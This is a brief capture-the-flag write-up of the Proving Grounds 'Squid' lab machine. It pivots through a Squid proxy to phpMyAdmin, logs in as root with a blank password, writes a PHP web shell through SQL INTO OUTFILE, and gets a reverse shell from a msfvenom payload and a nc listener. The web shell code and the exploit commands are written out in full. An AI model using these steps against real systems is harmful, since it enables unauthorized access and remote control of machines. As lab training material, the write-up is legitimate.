Proving grounds Practice - Squid CTF writeup.
Nmap
PORT STATE SERVICE VERSION
3128/tcp open http-proxy Squid http proxy 4.14
|_http-server-header: squid/4.14
|_http-title: ERROR: The requested URL could not be retrieved
Squid http proxy service running on PORT 3128. Use Squid Pivoting Open Port Scanner to perform PORT scanning.
Configure the proxy server IP
and PORT
in the browser to access the webserver running on PORT 8080.
System Information
PHPMyadmin
Login with username root
and password as null
.
Execute below sql query to create reverse shell.
SELECT "<?php system($_GET['cmd'])?>" INTO OUTFILE "C:/wamp/www/shell2.php"
As shown in the phpinfo() page the document root folder is C:/wamp/www
. So the shell will be publicly accessible at http://192.168.237.189:8080/shell2.php
.
Remote Code Execution
http://192.168.237.189:8080/shell2.php?cmd=whoami
Obtain Stable Shell using msfvenom
msfvenom -f exe -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=1234 -o mshell.exe
Use curl to download the shell in to the attacking machine. Run a nc
llisterner and execute the reverse shell by visiting http://192.168.237.189:8080/shell2.php?cmd=mshell.exe
Reverse shell obtained.
Thanks for reading!
For more updates and insights, follow me on Twitter: @thevillagehacker.